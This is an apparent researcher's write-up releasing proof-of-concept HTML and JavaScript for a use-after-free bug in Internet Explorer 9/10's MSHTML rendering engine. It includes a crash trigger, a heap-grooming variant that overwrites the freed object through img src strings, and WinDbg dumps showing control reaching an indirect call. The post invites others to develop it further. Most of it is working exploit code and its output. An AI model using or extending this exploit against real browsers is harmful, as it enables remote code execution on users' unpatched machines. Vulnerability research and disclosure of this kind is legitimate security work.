Latest M$ tuesday patch kill one of my 0day in Microsoft Internet Explorer 9/10. So I decided release Proof Of Concept code and writeup some analyze about this bug. Hope it helpful.

Here is the PoC:

<!doctype html>
<html>
        <head>
                <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
               <script>
                       function testcase(){
                                document.body.appendChild(document.createElement('progress'));
                                document.body.appendChild(document.createElement("<track style='float:right'></track>"));
                                document.body.appendChild(document.createElement('progress'));
                                document.body.appendChild(document.createElement('table'));
                                document.body.appendChild(document.createElement("<track style='float:right'></track>"));
                            document.getElementsByTagName('progress').item(0).appendChild(document.createElement('frameset'));
                                document.getElementsByTagName('track').item(0).offsetWidth;

                                document.getElementsByTagName('progress').item(1).appendChild(document.getElementsByTagName('track').item(0));
                                document.body.appendChild(document.createElement("<ins style='margin-left:2222222222px'></ins>"));

                </script>
        </head>
        <body onload='testcase();'>

        </body>
</html>

After running this html we’ve got a nice crash:
(fcc.354): Access violation - code c0000005 (!!! second chance !!!)<br /> eax=0b7befc0 ebx=088cd6b8 ecx=0b6b2fa8 edx=00000006 esi=0b6b2fa8 edi=00000000<br /> eip=639927e9 esp=088cd1c8 ebp=088cd1d0 iopl=0 nv up ei pl nz na po nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202<br /> MSHTML!CTreeNode::GetFancyFormat+0xc:<br /> 639927e9 0fb74640 movzx eax,word ptr [esi+40h] ds:0023:0b6b2fe8=0000<br /> 0:017> u<br /> MSHTML!CTreeNode::GetFancyFormat+0xc:<br /> 639927e9 0fb74640 movzx eax,word ptr [esi+40h]<br /> 639927ed 6685c0 test ax,ax<br />

Now using my binary instrumentation framework (a PIN based instrumentation which could do things like: crash analyze, taint tracing, code coverage..), I could get the following output

<br /> Exception Point: 639927e9 0fb74640 movzx eax,word ptr [esi+40h]<br /> Current Register:<br /> eax:0b7befc0<br /> esi:0b6b2fa8<br /> Backtrace analyze:<br /> [+]639927e7 -> esi: 0b6b2fa8 | ecx: 0b6b2fa8<br /> [+]639927e5 -> ecx: 0b6b2fa8<br /> [+]636c1d2d -> ecx:0b6b2fa8<br /> [+]639ae295 -> esi: 0b6b2fa8<br /> ===================<br /> Detect Freed Address: 0b6b2fa8 at EIP 639AE299<br /> With param: HeapFree(150000,23,0b6b2fa8)<br />

So it is a pretty nice Used After Free vulnerability. But what is freed?

Run the tool again, this time to collect information about Heap Allocate, I can see:
<br /> .....<br /> Detect Heap Allocate : 638f13dc<br /> With Param: HeapAlloc(150000, 8u, 0x54)<br /> Return value: 0b6b2fa8

And it occur in function:
CMarkup::InsertElementInternal
So now we can use a little trick to manipulate freed address:

<!doctype html>
<html>
	<head>
		<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />

		<script>

                function testcase(){

				var img = new Array();
				  for(var i = 0;i < 100;i++){
				  	img[i] = document.createElement('img');
				  	img[i]["src"] = "a";
				  }
				document.body.appendChild(document.createElement('progress'));
				document.body.appendChild(document.createElement("<track style='float:right'></track>"));
				document.body.appendChild(document.createElement('progress'));
				document.body.appendChild(document.createElement('table'));
				document.body.appendChild(document.createElement("<track style='float:right'></track>"));
			    document.getElementsByTagName('progress').item(0).appendChild(document.createElement('frameset'));
				document.getElementsByTagName('track').item(0).offsetWidth;

				document.getElementsByTagName('progress').item(1).appendChild(document.getElementsByTagName('track').item(0));
				document.body.appendChild(document.createElement("<ins style='margin-left:2222222222px'></ins>"));

				window.scroll(500);

				for(var j = 0;j < 99;j++){
				 	img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";}

				 }

		</script>
	</head>
	<body onload='testcase();'>

	</body>
</html>

And we’ve got:
<br /> (c10.d88): Access violation - code c0000005 (!!! second chance !!!)<br /> eax=00000041 ebx=088cd6b8 ecx=00410041 edx=ff000000 esi=0c53efa8 edi=00000000<br /> eip=639927ff esp=088cd1c8 ebp=088cd1d0 iopl=0 nv up ei pl nz na pe nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206<br /> MSHTML!CTreeNode::GetFancyFormat+0x1e:<br /> 639927ff 8b4a2c mov ecx,dword ptr [edx+2Ch] ds:0023:ff00002c=????????<br /> 0:017> dd esi<br /> 0c53efa8 00410041 00410041 00410041 00410041<br /> 0c53efb8 00410041 00410041 00410041 00410041<br /> 0c53efc8 00410041 00410041 00410041 00410041<br /> 0c53efd8 00410041 00410041 00410041 00410041<br /> 0c53efe8 00410041 00410041 00410041 00410041<br /> 0c53eff8 00410041 d0d00000 ???????? ????????<br /> 0c53f008 ???????? ???????? ???????? ????????<br /> 0c53f018 ???????? ???????? ???????? ????????<br /> 0:017> dd 410041<br /> 00410041 b341be78 7274f8ac 18ea3e88 3c00005c<br /> 00410051 ff000000 4dffffff cbb7a93b b0487827<br /> 00410061 ebd03627 48a7a85f 3d00005c ff000000<br /> 00410071 98ffffff 9b1b1704 a14da1bb 315fec5b<br /> 00410081 74f7c784 3e00005c ff000000 f0ffffff<br /> 00410091 0d343fb3 ae43076f 1b2599a9 a86d9aad<br /> 004100a1 3f00005c ff000000 93ffffff ddca1f10<br /> 004100b1 844c01b0 ebee76ab dc391fca 4000005c<br /> 0:017> u<br />
Why it crashing here:
<br /> .text:639927E9 movzx eax, word ptr [esi+40h]<br /> .text:639927ED test ax, ax<br /> .text:639927F0 js loc_63842DAE<br /> .text:639927F6 mov ecx, [esi+50h]<br /> .text:639927F9 mov edx, [ecx+80h]<br /> .text:639927FF mov ecx, [edx+2Ch]
Since we can control esi, we can force program to jump 63842DAE by changing some bytes in img.src:
<br /> ..<br /> img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAu8141u4141AAAAAAAA";}<br /> ....<br />

<br /> (614.fd4): Access violation - code c0000005 (!!! second chance !!!)<br /> eax=00000000 ebx=00000000 ecx=00410041 edx=b341be78 esi=088ccc00 edi=0c540fa8<br /> eip=6383a61a esp=088ccbe0 ebp=088ccbf0 iopl=0 nv up ei pl zr na pe nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<br /> MSHTML!CTreeNode::ComputeFormats+0xa1:<br /> 6383a61a 8b82c4000000 mov eax,dword ptr [edx+0C4h] ds:0023:b341bf3c=????????<br /> 0:017> dd edi<br /> 0c540fa8 00410041 00410041 00410041 00410041<br /> 0c540fb8 00410041 00410041 00410041 00410041<br /> 0c540fc8 00410041 00410041 00410041 00410041<br /> 0c540fd8 00410041 00410041 00410041 00410041<br /> 0c540fe8 41418141 00410041 00410041 00410041<br /> 0c540ff8 00410041 d0d00000 ???????? ????????<br /> 0c541008 ???????? ???????? ???????? ????????<br /> 0c541018 ???????? ???????? ???????? ????????<br /> 0:017> dd ecx<br /> 00410041 b341be78 7274f8ac 18ea3e88 3c00005c<br /> 00410051 ff000000 4dffffff cbb7a93b b0487827<br /> 00410061 ebd03627 48a7a85f 3d00005c ff000000<br /> 00410071 98ffffff 9b1b1704 a14da1bb 315fec5b<br /> 00410081 74f7c784 3e00005c ff000000 f0ffffff<br /> 00410091 0d343fb3 ae43076f 1b2599a9 a86d9aad<br /> 004100a1 3f00005c ff000000 93ffffff ddca1f10<br /> 004100b1 844c01b0 ebee76ab dc391fca 4000005c<br />

And we change edi:
<br /> img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAAu5555u5555AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAu8141u4141AAAAAAAA";}<br />

And Boom:
<br /> eax=00000000 ebx=00000000 ecx=55555555 edx=640386e0 esi=088ccc00 edi=0c678fa8<br /> eip=6383a618 esp=088ccbe0 ebp=088ccbf0 iopl=0 nv up ei pl zr na pe nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<br /> MSHTML!CTreeNode::ComputeFormats+0x9f:<br /> 6383a618 8b11 mov edx,dword ptr [ecx] ds:0023:55555555=????????<br /> 0:017> u<br /> MSHTML!CTreeNode::ComputeFormats+0x9f:<br /> 6383a618 8b11 mov edx,dword ptr [ecx]<br /> 6383a61a 8b82c4000000 mov eax,dword ptr [edx+0C4h]<br /> 6383a620 ffd0 call eax<br /> 6383a622 8b400c mov eax,dword ptr [eax+0Ch]<br /> 6383a625 57 push edi<br /> 6383a626 893e mov dword ptr [esi],edi<br /> 6383a628 894604 mov dword ptr [esi+4],eax<br /> 6383a62b 8b0f mov ecx,dword ptr [edi]

Good luck pwner :p